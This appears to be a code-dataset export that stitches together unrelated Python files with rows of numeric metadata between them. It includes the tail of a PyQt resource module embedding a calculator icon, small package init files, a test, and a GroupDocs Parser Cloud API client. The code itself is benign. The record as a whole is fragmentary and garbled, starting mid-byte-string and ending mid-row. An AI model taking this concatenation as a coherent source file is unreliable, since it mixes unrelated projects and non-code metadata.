\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x16\xc1\xc1\xc1\
\xae\xfe\xfe\xfe\xff\xbf\xb3\xbd\xff\x31\x07\x28\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x42\x1c\x3a\
\xff\xe0\xda\xdf\xff\xfb\xfb\xfb\xfe\x9e\x9e\x9e\x7c\x00\x00\x00\
\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x17\x17\x17\
\x20\xcd\xcd\xcd\xc0\xfe\xfe\xfe\xff\xcc\xc1\xc9\xff\x3f\x18\x37\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x56\x34\x4f\xff\xe6\xe1\xe5\
\xff\xfc\xfc\xfc\xfe\xaf\xaf\xaf\x93\x00\x00\x00\x17\x00\x00\x00\
\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x03\x17\x17\x17\x21\xc2\xc2\xc2\xb0\xfd\xfd\xfd\xfe\xee\xea\xed\
\xff\x7b\x60\x76\xff\x2c\x02\x24\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x34\x0b\x2c\xff\x99\x84\x94\xff\xfa\xf9\xf9\xff\xf6\xf6\xf6\
\xfb\xa5\xa5\xa5\x86\x00\x00\x00\x17\x00\x00\x00\x02\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x02\x00\x00\x00\x17\x9c\x9c\x9c\x7a\xee\xee\xee\
\xf0\xff\xff\xff\xff\xdf\xd8\xdd\xff\x8a\x72\x85\xff\x46\x21\x3f\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2c\x01\x23\xff\x54\x32\x4d\xff\x9c\x88\x98\
\xff\xee\xeb\xee\xff\xfe\xfe\xfe\xff\xe1\xe1\xe1\xdf\x79\x79\x79\
\x5a\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x3c\x3c\x3c\
\x33\xbb\xbb\xbb\x9e\xeb\xeb\xeb\xf1\xfe\xfe\xfe\xff\xff\xff\xff\
\xff\xea\xe5\xe9\xff\xcb\xc0\xc8\xff\xbc\xae\xb9\xff\xbe\xb1\xbb\
\xff\xd0\xc7\xce\xff\xf2\xef\xf1\xff\xff\xff\xff\xff\xfd\xfd\xfd\
\xff\xe4\xe4\xe4\xe3\xa6\xa6\xa6\x85\x15\x15\x15\x24\x00\x00\x00\
\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x02\x00\x00\x00\x0e\x1f\x1f\x1f\x28\x94\x94\x94\x6e\xc6\xc6\xc6\
\xab\xdb\xdb\xdb\xd5\xe7\xe7\xe7\xee\xee\xee\xee\xf7\xed\xed\xed\
\xf6\xe4\xe4\xe4\xea\xd7\xd7\xd7\xcd\xbe\xbe\xbe\x9f\x7b\x7b\x7b\
\x5d\x07\x07\x07\x20\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\
\x0e\x00\x00\x00\x16\x08\x08\x08\x1d\x07\x07\x07\x24\x07\x07\x07\
\x23\x09\x09\x09\x1c\x00\x00\x00\x15\x00\x00\x00\x0d\x00\x00\x00\
\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xe0\x07\
\xff\xff\x00\x00\xff\xfe\x00\x00\x7f\xf8\x00\x00\x1f\xf0\x00\x00\
\x0f\xe0\x00\x00\x07\xe0\x00\x00\x07\xc0\x00\x00\x03\x80\x00\x00\
\x01\x80\x00\x00\x01\x80\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x80\x00\x00\x01\x80\x00\x00\x01\x80\x00\x00\x01\xc0\x00\x00\
\x03\xe0\x00\x00\x07\xe0\x00\x00\x07\xf0\x00\x00\x0f\xf8\x00\x00\
\x1f\xfe\x00\x00\x7f\xff\x00\x00\xff\xff\xe0\x07\xff\
"
qt_resource_name = b"\
\x00\x05\
\x00\x6f\xa6\x53\
\x00\x69\
\x00\x63\x00\x6f\x00\x6e\x00\x73\
\x00\x13\
\x01\x47\x5b\xbf\
\x00\x63\
\x00\x61\x00\x6c\x00\x63\x00\x75\x00\x6c\x00\x61\x00\x74\x00\x6f\x00\x72\x00\x2d\x00\x69\x00\x63\x00\x6f\x00\x6e\x00\x2e\x00\x69\
\x00\x63\x00\x6f\
"
qt_resource_struct_v1 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x10\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
"
qt_resource_struct_v2 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x10\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01\x7b\xd4\x61\x0d\xca\
"
qt_version = [int(v) for v in QtCore.qVersion().split('.')]
if qt_version < [5, 8, 0]:
rcc_version = 1
qt_resource_struct = qt_resource_struct_v1
else:
rcc_version = 2
qt_resource_struct = qt_resource_struct_v2
def qInitResources():
QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 58.941718 | 129 | 0.727244 | 4,575 | 19,215 | 3.04612 | 0.063388 | 0.443886 | 0.587687 | 0.700057 | 0.731702 | 0.692738 | 0.680181 | 0.661668 | 0.654994 | 0.634974 | 0 | 0.315977 | 0.021494 | 19,215 | 325 | 130 | 59.123077 | 0.425221 | 0.00791 | 0 | 0.372168 | 0 | 0.889968 | 0.000052 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0.006472 | false | 0 | 0.003236 | 0 | 0.009709 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
fd7bfd56910454c24e99382e2efb0ceb04d9fd0f | 328 | py | Python | pysigpro/ecg/__init__.py | Ashwiinii/pysigpro | dcdb26c3389117851f6891f9720d1e9ee2fd88c8 | [
"MIT"
] | 1 | 2022-01-09T14:47:36.000Z | 2022-01-09T14:47:36.000Z | pysigpro/ecg/__init__.py | Ashwiinii/pysigpro | dcdb26c3389117851f6891f9720d1e9ee2fd88c8 | [
"MIT"
] | null | null | null | pysigpro/ecg/__init__.py | Ashwiinii/pysigpro | dcdb26c3389117851f6891f9720d1e9ee2fd88c8 | [
"MIT"
] | 2 | 2021-12-09T14:44:34.000Z | 2021-12-12T18:43:53.000Z | from .ecg_features import get_time_domain_features, get_geometrical_features, get_sample_entropy
from .preprocessing import remove_ecg_outliers, is_outlier, remove_ectopic_beats
__all__ = ['get_time_domain_features', 'get_geometrical_features', 'get_sample_entropy', 'remove_ecg_outliers', 'is_outlier', 'remove_ectopic_beats'] | 82 | 149 | 0.859756 | 44 | 328 | 5.75 | 0.409091 | 0.173913 | 0.102767 | 0.166008 | 0.814229 | 0.814229 | 0.814229 | 0.814229 | 0.466403 | 0.466403 | 0 | 0 | 0.060976 | 328 | 4 | 149 | 82 | 0.821429 | 0 | 0 | 0 | 0 | 0 | 0.349544 | 0.145897 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
4754f1dbf70cb7dc4f2c0b5b3a78bd266e9f4087 | 116 | py | Python | __init__.py | windowsboy111/merlin-py | 358a8fb3612b79af8cd1497b70463c712139d9e0 | [
"MIT"
] | 3 | 2020-12-24T17:05:09.000Z | 2021-03-04T21:15:15.000Z | __init__.py | windowsboy111/merlin | 358a8fb3612b79af8cd1497b70463c712139d9e0 | [
"MIT"
] | 19 | 2020-06-26T23:39:49.000Z | 2021-01-27T13:11:10.000Z | __init__.py | windowsboy111/merlin | 358a8fb3612b79af8cd1497b70463c712139d9e0 | [
"MIT"
] | 4 | 2020-06-27T05:37:35.000Z | 2020-07-10T03:20:23.000Z | from src.bot import bot, chat, cogs, get_logger, get_prefix, cmd_handle_log, cmd_handle_warn, nlog, slog, event_log
| 58 | 115 | 0.801724 | 21 | 116 | 4.095238 | 0.761905 | 0.209302 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112069 | 116 | 1 | 116 | 116 | 0.834951 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
47db574015a1ced288145ad2508164242a720e42 | 129 | py | Python | cargo_fuzz_sourcer/utils.py | MatejKastak/cargo-fuzz-sourcer | 12a4022213ede62a18b3deb7d00148bcc5c828bf | [
"MIT"
] | null | null | null | cargo_fuzz_sourcer/utils.py | MatejKastak/cargo-fuzz-sourcer | 12a4022213ede62a18b3deb7d00148bcc5c828bf | [
"MIT"
] | null | null | null | cargo_fuzz_sourcer/utils.py | MatejKastak/cargo-fuzz-sourcer | 12a4022213ede62a18b3deb7d00148bcc5c828bf | [
"MIT"
] | null | null | null | def objdump_is_available() -> bool:
"""Check if the `objdump` is installed."""
# TODO: Perform the check
return True
| 25.8 | 46 | 0.651163 | 17 | 129 | 4.823529 | 0.764706 | 0.219512 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.224806 | 129 | 4 | 47 | 32.25 | 0.82 | 0.472868 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 0 | 1 | 0.5 | true | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
9a345bf94769f32833269ecfbbec6b0f2ecfff41 | 120 | py | Python | test/test_utils.py | ownport/datastax-cassandra-deploy | 5eeb24f09ea7ae63f6234c75279f3592b4557400 | [
"Apache-2.0"
] | 1 | 2019-06-11T12:49:35.000Z | 2019-06-11T12:49:35.000Z | test/test_utils.py | ownport/datastax-cassandra-deploy | 5eeb24f09ea7ae63f6234c75279f3592b4557400 | [
"Apache-2.0"
] | null | null | null | test/test_utils.py | ownport/datastax-cassandra-deploy | 5eeb24f09ea7ae63f6234c75279f3592b4557400 | [
"Apache-2.0"
] | null | null | null |
from datastax_cassandra_deploy.utils import pretty_json
def test_pretty_json():
assert pretty_json({}) == '{}'
| 13.333333 | 55 | 0.725 | 15 | 120 | 5.4 | 0.733333 | 0.37037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.158333 | 120 | 8 | 56 | 15 | 0.80198 | 0 | 0 | 0 | 0 | 0 | 0.016949 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d05ca19bf2023a99f9a0a1da5e657a770745ff68 | 18,592 | py | Python | groupdocs_parser_cloud/apis/parse_api.py | groupdocs-parser-cloud/groupdocs-parser-cloud-python | e306362857cb78b17a5dc73a3bf707cbc6876ca3 | [
"MIT"
] | 1 | 2021-12-20T20:27:12.000Z | 2021-12-20T20:27:12.000Z | groupdocs_parser_cloud/apis/parse_api.py | groupdocs-parser-cloud/groupdocs-parser-cloud-python | e306362857cb78b17a5dc73a3bf707cbc6876ca3 | [
"MIT"
] | null | null | null | groupdocs_parser_cloud/apis/parse_api.py | groupdocs-parser-cloud/groupdocs-parser-cloud-python | e306362857cb78b17a5dc73a3bf707cbc6876ca3 | [
"MIT"
] | 1 | 2021-09-05T17:46:05.000Z | 2021-09-05T17:46:05.000Z | # coding: utf-8
# -----------------------------------------------------------------------------------
# <copyright company="Aspose Pty Ltd" file="parser_api.py">
# Copyright (c) 2003-2019 Aspose Pty Ltd
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# -----------------------------------------------------------------------------------
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from groupdocs_parser_cloud.auth import Auth
from groupdocs_parser_cloud.api_client import ApiClient
from groupdocs_parser_cloud.api_exception import ApiException
from groupdocs_parser_cloud.configuration import Configuration
class ParseApi(object):
"""
GroupDocs.Parser Cloud API
:param configuration: API configuration
"""
def __init__(self, configuration):
api_client = ApiClient(configuration)
self.auth = Auth(configuration, api_client)
self.api_client = api_client
self.configuration = configuration
def close(self): # noqa: E501
"""
Closes thread pool. This method should be called when
methods are executed asynchronously (is_async=True is passed as parameter)
and this instance of ParseApi is not going to be used any more.
"""
if self.api_client is not None:
if(self.api_client.pool is not None):
self.api_client.pool.close()
self.api_client.pool.join()
self.api_client.pool = None
@classmethod
def from_keys(cls, app_sid, app_key):
"""
Initializes new instance of ParseApi with API keys
:param app_sid Application identifier (App SID)
:param app_key Application private key (App Key)
"""
configuration = Configuration(app_sid, app_key)
return ParseApi(configuration)
@classmethod
def from_config(cls, configuration):
"""
Initializes new instance of ParseApi with configuration options
:param configuration API configuration
"""
return ParseApi(configuration)
def images(self, request,**kwargs): # noqa: E501
"""Extract images from document. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass is_async=True
:param is_async bool
:param ImagesOptions options: Extract image options. (required)
:return: ImagesResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('is_async'):
return self._images_with_http_info(request, **kwargs) # noqa: E501
(data) = self._images_with_http_info(request, **kwargs) # noqa: E501
return data
def _images_with_http_info(self, request, **kwargs): # noqa: E501
"""Extract images from document. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass is_async=True
:param is_async bool
:param ImagesRequest request object with parameters
:return: ImagesResult
If the method is called asynchronously,
returns the request thread.
"""
params = locals()
params['is_async'] = ''
params['_return_http_data_only'] = False
params['_preload_content'] = True
params['_request_timeout'] = ''
for key, val in six.iteritems(params['kwargs']):
if key not in params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method images" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'options' is set
if request.options is None:
raise ValueError("Missing the required parameter `options` when calling `images`") # noqa: E501
collection_formats = {}
path = '/parser/images'
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = []
body_params = None
if request.options is not None:
body_params = request.options
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
call_kwargs = {
'resource_path':path,
'method':'POST',
'path_params':path_params,
'query_params':query_params,
'header_params':header_params,
'body':body_params,
'post_params':form_params,
'files':local_var_files,
'response_type':'ImagesResult', # noqa: E501
'auth_settings':self.auth.get_auth_settings(),
'is_async':params.get('is_async'),
'_return_http_data_only':params.get('_return_http_data_only'),
'_preload_content':params.get('_preload_content', True),
'_request_timeout':params.get('_request_timeout'),
'collection_formats':collection_formats
}
return self.api_client.call_api(**call_kwargs) # noqa: E501
def parse(self, request,**kwargs): # noqa: E501
"""Extract document data by a predefined template. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass is_async=True
:param is_async bool
:param ParseOptions options: Parse options. (required)
:return: ParseResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('is_async'):
return self._parse_with_http_info(request, **kwargs) # noqa: E501
(data) = self._parse_with_http_info(request, **kwargs) # noqa: E501
return data
def _parse_with_http_info(self, request, **kwargs): # noqa: E501
"""Extract document data by a predefined template. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass is_async=True
:param is_async bool
:param ParseRequest request object with parameters
:return: ParseResult
If the method is called asynchronously,
returns the request thread.
"""
params = locals()
params['is_async'] = ''
params['_return_http_data_only'] = False
params['_preload_content'] = True
params['_request_timeout'] = ''
for key, val in six.iteritems(params['kwargs']):
if key not in params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method parse" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'options' is set
if request.options is None:
raise ValueError("Missing the required parameter `options` when calling `parse`") # noqa: E501
collection_formats = {}
path = '/parser/parse'
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = []
body_params = None
if request.options is not None:
body_params = request.options
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
call_kwargs = {
'resource_path':path,
'method':'POST',
'path_params':path_params,
'query_params':query_params,
'header_params':header_params,
'body':body_params,
'post_params':form_params,
'files':local_var_files,
'response_type':'ParseResult', # noqa: E501
'auth_settings':self.auth.get_auth_settings(),
'is_async':params.get('is_async'),
'_return_http_data_only':params.get('_return_http_data_only'),
'_preload_content':params.get('_preload_content', True),
'_request_timeout':params.get('_request_timeout'),
'collection_formats':collection_formats
}
return self.api_client.call_api(**call_kwargs) # noqa: E501
def text(self, request,**kwargs): # noqa: E501
"""Extract text from document. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass is_async=True
:param is_async bool
:param TextOptions options: Extract text options. (required)
:return: TextResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('is_async'):
return self._text_with_http_info(request, **kwargs) # noqa: E501
(data) = self._text_with_http_info(request, **kwargs) # noqa: E501
return data
def _text_with_http_info(self, request, **kwargs): # noqa: E501
"""Extract text from document. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass is_async=True
:param is_async bool
:param TextRequest request object with parameters
:return: TextResult
If the method is called asynchronously,
returns the request thread.
"""
params = locals()
params['is_async'] = ''
params['_return_http_data_only'] = False
params['_preload_content'] = True
params['_request_timeout'] = ''
for key, val in six.iteritems(params['kwargs']):
if key not in params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method text" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'options' is set
if request.options is None:
raise ValueError("Missing the required parameter `options` when calling `text`") # noqa: E501
collection_formats = {}
path = '/parser/text'
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = []
body_params = None
if request.options is not None:
body_params = request.options
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
call_kwargs = {
'resource_path':path,
'method':'POST',
'path_params':path_params,
'query_params':query_params,
'header_params':header_params,
'body':body_params,
'post_params':form_params,
'files':local_var_files,
'response_type':'TextResult', # noqa: E501
'auth_settings':self.auth.get_auth_settings(),
'is_async':params.get('is_async'),
'_return_http_data_only':params.get('_return_http_data_only'),
'_preload_content':params.get('_preload_content', True),
'_request_timeout':params.get('_request_timeout'),
'collection_formats':collection_formats
}
return self.api_client.call_api(**call_kwargs) # noqa: E501
def __downcase_first_letter(self, s):
if len(s) == 0:
return str
else:
return s[0].lower() + s[1:]
# coding: utf-8
# --------------------------------------------------------------------------------
# <copyright company="Aspose Pty Ltd" file="images_request.py">
# Copyright (c) 2003-2019 Aspose Pty Ltd
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# --------------------------------------------------------------------------------
class ImagesRequest(object):
"""
Request model for images operation.
:param options Extract image options.
"""
def __init__(self, options):
"""Initializes new instance of ImagesRequest.""" # noqa: E501
self.options = options
# coding: utf-8
# --------------------------------------------------------------------------------
# <copyright company="Aspose Pty Ltd" file="parse_request.py">
# Copyright (c) 2003-2019 Aspose Pty Ltd
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# --------------------------------------------------------------------------------
class ParseRequest(object):
"""
Request model for parse operation.
:param options Parse options.
"""
def __init__(self, options):
"""Initializes new instance of ParseRequest.""" # noqa: E501
self.options = options
# coding: utf-8
# --------------------------------------------------------------------------------
# <copyright company="Aspose Pty Ltd" file="text_request.py">
# Copyright (c) 2003-2019 Aspose Pty Ltd
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# --------------------------------------------------------------------------------
class TextRequest(object):
"""
Request model for text operation.
:param options Extract text options.
"""
def __init__(self, options):
"""Initializes new instance of TextRequest.""" # noqa: E501
self.options = options
| 39.306554 | 108 | 0.622902 | 2,168 | 18,592 | 5.193727 | 0.118542 | 0.028419 | 0.017318 | 0.02238 | 0.853464 | 0.839165 | 0.823446 | 0.823446 | 0.823446 | 0.786146 | 0 | 0.011936 | 0.260972 | 18,592 | 472 | 109 | 39.389831 | 0.807569 | 0.489727 | 0 | 0.70297 | 0 | 0 | 0.186081 | 0.030268 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069307 | false | 0 | 0.034653 | 0 | 0.188119 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d06bca0f5137d798e6ac9af958e75bdd57ae0c55 | 3,645 | py | Python | test/test_templates_collection.py | dmulyalin/template-text-renderer | f1993b6e8f652d55207b7d0961673dea8e7ffec1 | [
